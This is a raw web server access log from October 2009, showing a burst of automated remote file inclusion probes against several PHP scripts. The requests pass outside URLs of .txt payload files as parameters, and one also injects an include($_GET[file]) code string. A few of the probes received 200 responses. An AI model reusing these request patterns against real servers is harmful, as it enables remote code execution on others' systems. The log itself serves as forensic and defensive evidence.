216.71.23.37 - - [22/Oct/2009:00:38:05 -0400] "GET /logs/access_log.Q109091100//hw3.php?daysonly=0).include($_GET%5Bfile%5D).(0&file=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.0" 404 233 "-" "Mozilla/5.0"
77.79.246.241 - - [22/Oct/2009:00:38:27 -0400] "GET //hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
77.79.246.241 - - [22/Oct/2009:00:38:27 -0400] "GET /logs/access_log.Q109080600//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
77.79.246.241 - - [22/Oct/2009:00:38:27 -0400] "GET /logs//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
12.184.155.34 - - [22/Oct/2009:00:38:45 -0400] "GET ///setting.php?path[docroot]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
12.184.155.34 - - [22/Oct/2009:00:38:46 -0400] "GET /logs///setting.php?path[docroot]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 216 "-" "Mozilla/5.0"
12.184.155.34 - - [22/Oct/2009:00:38:46 -0400] "GET /logs/access_log.Q109050900%20%20///setting.php?path[docroot]=http://www.difusion.com.mx/altair/libraries/openid/Auth/OpenID/.ht/one??? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
151.8.79.19 - - [22/Oct/2009:00:39:02 -0400] "GET //phplive/setup/header.php?css_path=http://www.genesismania.net/bbs/icon/copyright.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
151.8.79.19 - - [22/Oct/2009:00:39:02 -0400] "GET /logs//phplive/setup/header.php?css_path=http://www.genesismania.net/bbs/icon/copyright.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
77.79.246.241 - - [22/Oct/2009:00:39:04 -0400] "GET /logs/access_log.Q109091100//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
151.8.79.19 - - [22/Oct/2009:00:39:05 -0400] "GET /logs/access_log.Q109093000//phplive/setup/header.php?css_path=http://www.genesismania.net/bbs/icon/copyright.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
216.71.23.37 - - [22/Oct/2009:00:39:07 -0400] "GET ///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.0" 200 453 "-" "Mozilla/5.0"
216.71.23.37 - - [22/Oct/2009:00:39:07 -0400] "GET /logs///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.0" 200 22864 "-" "Mozilla/5.0"
216.71.23.37 - - [22/Oct/2009:00:39:10 -0400] "GET /logs/access_log.Q109090500%20%20///?_SERVER%5BDOCUMENT_ROOT%5D=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.0" 404 229 "-" "Mozilla/5.0"
222.236.47.182 - - [22/Oct/2009:00:39:19 -0400] "GET /logs/access_log.Q109051800%20%20//galeria.php?start=0&kategoria=http://erotimag.de/include/data/uploads/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
66.249.71.152 - - [22/Oct/2009:00:39:22 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L1143704F5A8995007799093+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
222.236.47.182 - - [22/Oct/2009:00:39:33 -0400] "GET /logs/access_log.Q109071800%20%20//galeria.php?start=0&kategoria=http://erotimag.de/include/data/uploads/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
77.79.246.241 - - [22/Oct/2009:00:39:47 -0400] "GET ///?_SERVER[DOCUMENT_ROOT]=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.1" 200 453 "-" "Mozilla/5.0"
77.79.246.241 - - [22/Oct/2009:00:39:47 -0400] "GET /logs/access_log.Q109090500%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
77.79.246.241 - - [22/Oct/2009:00:39:47 -0400] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.montepo.com/img/iniziative/baner.txt?? HTTP/1.1" 200 22864 "-" "Mozilla/5.0"
